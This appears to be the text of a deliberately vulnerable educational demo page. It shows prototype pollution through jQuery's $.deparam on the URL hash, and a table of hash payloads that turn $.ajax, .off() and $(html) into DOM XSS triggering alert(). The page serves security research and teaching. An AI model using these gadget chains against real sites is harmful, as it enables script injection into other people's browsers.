Beware:
We intentionally designed this page to be vulnerable to DOM-based XSS and prototype pollution.
Visiting links to page in the browser can result in the execution of arbitrary JavaScript.
This page was intended for educational and research purposes only.
Interact with it at your own risk.
Function(s) Affected | Payload |
$.ajax on objects, $.get. $.post, etc. | #__proto__[url][]=data:,alert(123)//&__proto__[dataType]=script |
(x).off(...) |
#__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%3dalert(456)> |
$(html) | #__proto__[div][1]=<img src onerror%3dalert(789)> |
prototypePollution-demo.html#PAYLOAD
$.deparam()
function converts the page's URL hash parameters into objects.
deparam()
will alter Object.prototype
.
var urlHash = $.deparam(location.hash.slice(1));
Object.prototype
during pollution. These three functions are
present and vulnerable $.ajax
and a few of its related